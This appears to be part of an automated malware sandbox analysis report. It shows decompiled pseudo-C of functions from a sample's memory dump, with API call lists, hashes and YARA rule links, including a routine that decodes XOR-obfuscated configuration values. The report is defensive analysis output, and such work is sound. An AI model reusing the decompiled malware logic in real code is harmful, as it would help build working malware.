                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Heap$Allocate$Freelstrlen
                            • String ID:
                            • API String ID: 2220322926-0
                            • Opcode ID: 17ec399724f8b7f8009c05776114f358fb44bd1325391c6b09a43721b4f213ad
                            • Instruction ID: e4813ca542edabc59a30f0a7b23fd93e356ad471f3458cfa09e70f77705b0af2
                            • Opcode Fuzzy Hash: 17ec399724f8b7f8009c05776114f358fb44bd1325391c6b09a43721b4f213ad
                            • Instruction Fuzzy Hash: 7F016976100208FFCB12CF44DC00EEA7BB9EBA4360F118025F94996160E775EA95EB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F18B51, Relevance: 1.5, APIs: 1, Instructions: 32registryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 58%
                            			E00F18B51(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				void* _t18;

				if(_a4 == 0) {
					L2:
					_t18 =  *0xf1d0bc(_a8, _a12,  &_a4);
					if(_t18 == 0) {
						RegCloseKey(_a4);
					}
					L4:
					return _t18;
				}
				_t14 =  *0xf1d2b8; // 0x48da5a8
				_t16 = E00F15A5E(_t17, _a4, _a8, _a12, _t14 + 0xf1e180, 0, 0, 0); // executed
				_t18 = _t16;
				if(_t18 == 0) {
					goto L4;
				}
				goto L2;
			}







                            0x00f18b59
                            0x00f18b81
                            0x00f18b91
                            0x00f18b95
                            0x00f18b9a
                            0x00f18b9a
                            0x00f18ba0
                            0x00f18ba4
                            0x00f18ba4
                            0x00f18b5b
                            0x00f18b76
                            0x00f18b7b
                            0x00f18b7f
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                            • RegCloseKey.ADVAPI32(00000000,?,00F16941,3D00F1C0,00000000,80000002,?,80000002,?,?,?,00F14993,80000002), ref: 00F18B9A
                              • Part of subcall function 00F15A5E: SysFreeString.OLEAUT32(?), ref: 00F15B3D
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CloseFreeString
                            • String ID:
                            • API String ID: 3574410727-0
                            • Opcode ID: 6bc86d8dbe331d4f5d4c625614250e4117096a303ed55dcfca0b64a8dde652f4
                            • Instruction ID: 95ed84d7c8b305e4b829e5a1f115c9d3c9517d3c35832bf402a5e8e89b828a5d
                            • Opcode Fuzzy Hash: 6bc86d8dbe331d4f5d4c625614250e4117096a303ed55dcfca0b64a8dde652f4
                            • Instruction Fuzzy Hash: A5F05E3250161CFFDB228F40DC00FE97B69AF047A0F058160FE089A160C771DD61ABD0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F16DFA, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00F16DFA(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0xf1d270, 0, _a4); // executed
				return _t2;
			}




                            0x00f16e06
                            0x00f16e0c

                            APIs
                            • RtlFreeHeap.NTDLL(00000000,00000000,00F155CD,00000000,?,?,00000000), ref: 00F16E06
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: 72d5982f51d8c0eaa40d951e9c7496c40a6f0cb0d2904b452dab19ef86cf12be
                            • Instruction ID: a069068ce699ca2cf94b7e4e6a1d03157886ab76ad0aa7a1dd9447c07dcbd765
                            • Opcode Fuzzy Hash: 72d5982f51d8c0eaa40d951e9c7496c40a6f0cb0d2904b452dab19ef86cf12be
                            • Instruction Fuzzy Hash: 40B01275040204EBCE114B10DE08F457B31B764700F03C011B20040074C2324430FB15
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F155DC, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00F155DC(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xf1d270, 0, _a4); // executed
				return _t2;
			}




                            0x00f155e8
                            0x00f155ee

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 3aef49f05321fdb9fee3063f90a7389b12aa23c82f8eaa96c80864cf7521343a
                            • Instruction ID: dcd765e92a79815790836d8ef1351f820005e18bc7c50fab9aa581d442a87e2b
                            • Opcode Fuzzy Hash: 3aef49f05321fdb9fee3063f90a7389b12aa23c82f8eaa96c80864cf7521343a
                            • Instruction Fuzzy Hash: A8B012B9140104EFCE114B50DF04F457E31B764700F03D011F30444070C2314420FB04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F12363, Relevance: 1.3, APIs: 1, Instructions: 98COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00F12363(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				void* _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {
					L21:
					return _t53;
				} else {
					_t58 =  &_v164;
					_t37 = E00F1A483(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {
						goto L21;
					}
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						_t53 = _v148;
						_t51 = E00F155DC(_t53);
						_t73 = _t51;
						_v8 = _t51;
						if(_t51 != 0) {
							_t53 = 0;
							L18:
							if(_t53 != 0) {
								goto L21;
							}
							L19:
							if(_v8 != 0) {
								E00F16DFA(_v8);
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						E00F16B8E(_t58, _t73, _t63, _t53,  &_v32);
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
							L15:
							_t53 = 0;
							goto L19;
						} else {
							 *_a8 = _t63;
							goto L18;
						}
					}
					_t42 = E00F16E7F(_t61, _a4,  &_v8,  &_v12,  &_v144, 0); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						_t53 = _v12;
						goto L18;
					}
					_t53 = _v148;
					__eflags = _v12 - _t53;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}























                            0x00f1236e
                            0x00f12371
                            0x00f1237a
                            0x00f1237d
                            0x00f12380
                            0x00f12383
                            0x00f1247c
                            0x00f12480
                            0x00f12395
                            0x00f123a1
                            0x00f123a8
                            0x00f123af
                            0x00000000
                            0x00000000
                            0x00f123b5
                            0x00f123bd
                            0x00000000
                            0x00000000
                            0x00f123c3
                            0x00f123cc
                            0x00f123d0
                            0x00000000
                            0x00000000
                            0x00f123d2
                            0x00f123d9
                            0x00f123de
                            0x00f123e0
                            0x00f123e3
                            0x00f12461
                            0x00f12468
                            0x00f1246a
                            0x00000000
                            0x00000000
                            0x00f1246c
                            0x00f12470
                            0x00f12475
                            0x00f12475
                            0x00000000
                            0x00f12470
                            0x00f123ea
                            0x00f123f2
                            0x00f123f2
                            0x00f123fb
                            0x00f12409
                            0x00f1245d
                            0x00f1245d
                            0x00000000
                            0x00f1242c
                            0x00f1242f
                            0x00000000
                            0x00f1242f
                            0x00f12409
                            0x00f12449
                            0x00f1244e
                            0x00f12450
                            0x00f12465
                            0x00000000
                            0x00f12465
                            0x00f12452
                            0x00f12458
                            0x00f1245b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f1245b

                            APIs
                            • memcpy.NTDLL(00000000,?,?,?,?,?,00000001,?,00000001,?), ref: 00F123EA
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: memcpy
                            • String ID:
                            • API String ID: 3510742995-0
                            • Opcode ID: 33001e3b9a6cb1d0f9a6f5c8c82e8a7ada59412a574fd8dff2d869cb30235c3d
                            • Instruction ID: 92503cc3d4365912c9fdab8b36953b40f576e83d007e9644364890b3fda05a7b
                            • Opcode Fuzzy Hash: 33001e3b9a6cb1d0f9a6f5c8c82e8a7ada59412a574fd8dff2d869cb30235c3d
                            • Instruction Fuzzy Hash: A5313871E00219EFDF61DEE8C880BEEB7B8BB14314F1040A9E559A3142D6749ED5AF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F1A415, Relevance: 1.3, APIs: 1, Instructions: 42memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00F1A415(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t24;
				signed short _t25;
				signed int _t27;
				intOrPtr* _t28;
				signed short _t29;

				_t28 = __edi;
				if(_a4 == 0) {
					L2:
					_t29 = E00F15607(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t29 == 0) {
						_t27 = _a12 >> 1;
						if(_t27 == 0) {
							_t29 = 2;
							HeapFree( *0xf1d270, 0, _a4);
						} else {
							_t24 = _a4;
							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
							 *_t28 = _t24;
						}
					}
					L6:
					return _t29;
				}
				_t25 = E00F13196(_a4, _a8, _a12, __edi); // executed
				_t29 = _t25;
				if(_t29 == 0) {
					goto L6;
				}
				goto L2;
			}








                            0x00f1a415
                            0x00f1a41d
                            0x00f1a434
                            0x00f1a44f
                            0x00f1a453
                            0x00f1a458
                            0x00f1a45a
                            0x00f1a46a
                            0x00f1a476
                            0x00f1a45c
                            0x00f1a45c
                            0x00f1a45f
                            0x00f1a464
                            0x00f1a464
                            0x00f1a45a
                            0x00f1a47c
                            0x00f1a480
                            0x00f1a480
                            0x00f1a429
                            0x00f1a42e
                            0x00f1a432
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                              • Part of subcall function 00F13196: SysFreeString.OLEAUT32(00000000), ref: 00F131FC
                            • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,7519F710,?,00000000,?,00000000,?,00F14C93,?,?,057F93B8,00000000,?), ref: 00F1A476
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Free$HeapString
                            • String ID:
                            • API String ID: 3806048269-0
                            • Opcode ID: 2afb285bf36493a953f0e14c06b370edd1e2ad8027eca39b1deaa1bcad946d8a
                            • Instruction ID: 2f8a0f4fa7ba016f08204d186ab86ce00b3e2b62ed908842112a7808f94731e2
                            • Opcode Fuzzy Hash: 2afb285bf36493a953f0e14c06b370edd1e2ad8027eca39b1deaa1bcad946d8a
                            • Instruction Fuzzy Hash: A2014632402659FBCB229F84CC09FEA3B65FB087A0F058029FE049A121C771D9A0EBD0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F14FA0, Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00F14FA0(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E00F188FF(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E00F1262B(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}




                            0x00f14fa8
                            0x00f14fc2
                            0x00000000
                            0x00f14fde
                            0x00f14fb9
                            0x00f14fc0
                            0x00000000
                            0x00000000
                            0x00f14fe5

                            APIs
                            • lstrlenW.KERNEL32(?,?,?,00F14AAE,3D00F1C0,80000002,00F16096,00F1A6E1,?,?,00F1A6E1,?,3D00F1C0,80000002,00F16096,?), ref: 00F14FC5
                              • Part of subcall function 00F1262B: SysAllocString.OLEAUT32(00F1A6E1), ref: 00F12645
                              • Part of subcall function 00F1262B: SysFreeString.OLEAUT32(00000000), ref: 00F12685
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: String$AllocFreelstrlen
                            • String ID:
                            • API String ID: 3808004451-0
                            • Opcode ID: ed7ef240eabf3413ce8848af6cf23990a78a44a5d1bf1bd16f25b6b35cb58d87
                            • Instruction ID: 6ff7d695f2a95423c6bf91e21db3da9dc85f3b52bf103d3ad550bc239c556b57
                            • Opcode Fuzzy Hash: ed7ef240eabf3413ce8848af6cf23990a78a44a5d1bf1bd16f25b6b35cb58d87
                            • Instruction Fuzzy Hash: 6FF07F3200420EBBDF069F90ED06EDA3F6AEB08350F058014BA0455161DB32D9B2FBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F16A16, Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00F16A16(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E00F160DD(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E00F16DFA(_a4);
				}
				return _t12;
			}





                            0x00f16a22
                            0x00f16a27
                            0x00f16a2b
                            0x00f16a32
                            0x00f16a3d
                            0x00f16a41
                            0x00f16a41
                            0x00f16a4a

                            APIs
                              • Part of subcall function 00F160DD: memcpy.NTDLL(00000000,00000110,?,?,?,00000008), ref: 00F16113
                              • Part of subcall function 00F160DD: memset.NTDLL ref: 00F16188
                              • Part of subcall function 00F160DD: memset.NTDLL ref: 00F1619C
                            • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,00F15BE3,?,?,00F1512B,00000002,?,?,?), ref: 00F16A32
                              • Part of subcall function 00F16DFA: RtlFreeHeap.NTDLL(00000000,00000000,00F155CD,00000000,?,?,00000000), ref: 00F16E06
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: memcpymemset$FreeHeap
                            • String ID:
                            • API String ID: 3053036209-0
                            • Opcode ID: 1de2f2b2d369184cfa0738fd9f5a90c1c0e5296654ede8fae6ba90d5d4c21a8e
                            • Instruction ID: f30a2e6144714fbda3863cc904b5ceebb0ba72f81206825af0fa39743f94d18c
                            • Opcode Fuzzy Hash: 1de2f2b2d369184cfa0738fd9f5a90c1c0e5296654ede8fae6ba90d5d4c21a8e
                            • Instruction Fuzzy Hash: DDE08637501128B7C7122A94DC01DEB7F5DCF557A0F044020FD0895101E639C590A3E2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 00F1294D, Relevance: 12.3, APIs: 8, Instructions: 258memoryCOMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 92%
                            			E00F1294D(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t115;
				void* _t118;
				intOrPtr _t121;

				_t118 = __esi;
				_t115 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0xf1d2b4; // 0x69b25f44
				if(E00F15740( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0xf1d308 = _v8;
				}
				_t33 =  *0xf1d2b4; // 0x69b25f44
				if(E00F15740( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0xf1d2b4; // 0x69b25f44
				_push(_t115);
				if(E00F15740( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0xf1d270, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0xf1d2b4; // 0x69b25f44
						_t45 = E00F14F59(_t104, _t102, _t98 ^ 0x7895433b);
					}
					_push(_t118);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0xf1d278 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0xf1d2b4; // 0x69b25f44
						_t46 = E00F14F59(_t104, _t102, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0xf1d27c = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0xf1d2b4; // 0x69b25f44
						_t47 = E00F14F59(_t104, _t102, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0xf1d280 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0xf1d2b4; // 0x69b25f44
						_t48 = E00F14F59(_t104, _t102, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0xf1d004 = _v8;
						}
					}
					if(_t102 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0xf1d2b4; // 0x69b25f44
						_t49 = E00F14F59(_t104, _t102, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0xf1d02c = _v8;
						}
					}
					if(_t102 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0xf1d2b4; // 0x69b25f44
						_t50 = E00F14F59(_t104, _t102, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0xf1d284 = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t102 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0xf1d2b4; // 0x69b25f44
								_t51 = E00F14F59(_t104, _t102, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E00F12C74(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E00F14D70();
								}
							}
							if(_t102 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0xf1d2b4; // 0x69b25f44
								_t52 = E00F14F59(_t104, _t102, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E00F12C74(0, _t52) != 0) {
								_t121 =  *0xf1d35c; // 0x57f95b0
								E00F13A19(_t121 + 4, _t68);
							}
							if(_t102 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0xf1d2b4; // 0x69b25f44
								_t53 = E00F14F59(_t104, _t102, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0xf1d2b8; // 0x48da5a8
								 *0xf1d304 = _t54 + 0xf1e252;
								goto L60;
							} else {
								_t64 = E00F12C74(0, _t53);
								 *0xf1d304 = _t64;
								if(_t64 != 0) {
									L60:
									if(_t102 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0xf1d2b4; // 0x69b25f44
										_t56 = E00F14F59(_t104, _t102, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0xf1d2b8; // 0x48da5a8
										_t58 = _t57 + 0xf1e79a;
									} else {
										_t58 = E00F12C74(0, _t56);
									}
									 *0xf1d370 = _t58;
									HeapFree( *0xf1d270, 0, _t102);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}








































                            0x00f1294d
                            0x00f1294d
                            0x00f1294d
                            0x00f1294d
                            0x00f12950
                            0x00f1296d
                            0x00f1297b
                            0x00f1297b
                            0x00f12980
                            0x00f1299a
                            0x00f12c08
                            0x00f12c0f
                            0x00f12c13
                            0x00f12c13
                            0x00f129a0
                            0x00f129a5
                            0x00f129bd
                            0x00f12bf5
                            0x00f12bff
                            0x00000000
                            0x00f129c3
                            0x00f129c3
                            0x00f129c4
                            0x00f129c9
                            0x00f129df
                            0x00f129cb
                            0x00f129cb
                            0x00f129d8
                            0x00f129d8
                            0x00f129e3
                            0x00f129ea
                            0x00f129ec
                            0x00f129f6
                            0x00f129fb
                            0x00f129fb
                            0x00f129f6
                            0x00f12a02
                            0x00f12a18
                            0x00f12a04
                            0x00f12a04
                            0x00f12a11
                            0x00f12a11
                            0x00f12a1c
                            0x00f12a1e
                            0x00f12a28
                            0x00f12a2d
                            0x00f12a2d
                            0x00f12a28
                            0x00f12a34
                            0x00f12a4a
                            0x00f12a36
                            0x00f12a36
                            0x00f12a43
                            0x00f12a43
                            0x00f12a4e
                            0x00f12a50
                            0x00f12a5a
                            0x00f12a5f
                            0x00f12a5f
                            0x00f12a5a
                            0x00f12a66
                            0x00f12a7c
                            0x00f12a68
                            0x00f12a68
                            0x00f12a75
                            0x00f12a75
                            0x00f12a80
                            0x00f12a82
                            0x00f12a8c
                            0x00f12a91
                            0x00f12a91
                            0x00f12a8c
                            0x00f12a98
                            0x00f12aae
                            0x00f12a9a
                            0x00f12a9a
                            0x00f12aa7
                            0x00f12aa7
                            0x00f12ab2
                            0x00f12ab4
                            0x00f12abe
                            0x00f12ac3
                            0x00f12ac3
                            0x00f12abe
                            0x00f12aca
                            0x00f12ae0
                            0x00f12acc
                            0x00f12acc
                            0x00f12ad9
                            0x00f12ad9
                            0x00f12ae4
                            0x00f12af7
                            0x00f12af7
                            0x00000000
                            0x00f12ae6
                            0x00f12ae6
                            0x00f12af0
                            0x00000000
                            0x00f12b01
                            0x00f12b01
                            0x00f12b03
                            0x00f12b19
                            0x00f12b05
                            0x00f12b05
                            0x00f12b12
                            0x00f12b12
                            0x00f12b1d
                            0x00f12b1f
                            0x00f12b22
                            0x00f12b23
                            0x00f12b2a
                            0x00f12b2c
                            0x00f12b2d
                            0x00f12b2d
                            0x00f12b2a
                            0x00f12b34
                            0x00f12b4a
                            0x00f12b36
                            0x00f12b36
                            0x00f12b43
                            0x00f12b43
                            0x00f12b4e
                            0x00f12b5c
                            0x00f12b66
                            0x00f12b66
                            0x00f12b6e
                            0x00f12b84
                            0x00f12b70
                            0x00f12b70
                            0x00f12b7d
                            0x00f12b7d
                            0x00f12b88
                            0x00f12b9b
                            0x00f12b9b
                            0x00f12ba6
                            0x00000000
                            0x00f12b8a
                            0x00f12b8d
                            0x00f12b94
                            0x00f12b99
                            0x00f12bab
                            0x00f12bad
                            0x00f12bc3
                            0x00f12baf
                            0x00f12baf
                            0x00f12bbc
                            0x00f12bbc
                            0x00f12bc7
                            0x00f12bd3
                            0x00f12bd8
                            0x00f12bc9
                            0x00f12bcc
                            0x00f12bcc
                            0x00f12be6
                            0x00f12beb
                            0x00f12bf1
                            0x00000000
                            0x00f12bf4
                            0x00000000
                            0x00f12b99
                            0x00f12b88
                            0x00f12af0
                            0x00f12ae4

                            APIs
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,00F1D00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 00F129F2
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,00F1D00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 00F12A24
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,00F1D00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 00F12A56
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,00F1D00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 00F12A88
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,00F1D00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 00F12ABA
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,00F1D00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 00F12AEC
                            • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 00F12BEB
                            • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 00F12BFF
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: ffc3e362b3e1173d1b9dccc9724af398ba96d9a614f13d62efef3f8cf17d0a58
                            • Instruction ID: d0d2af073dca677e82ef453c2e52b6032a63928c189a0a0d4d61d10e1c6adc4d
                            • Opcode Fuzzy Hash: ffc3e362b3e1173d1b9dccc9724af398ba96d9a614f13d62efef3f8cf17d0a58
                            • Instruction Fuzzy Hash: 7581A471A00209EECBA0EBF49DC4DEF77F9AB887107258925A011D7214E679DD95BB20
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F13373, Relevance: 1.9, APIs: 1, Instructions: 610COMMONCrypto
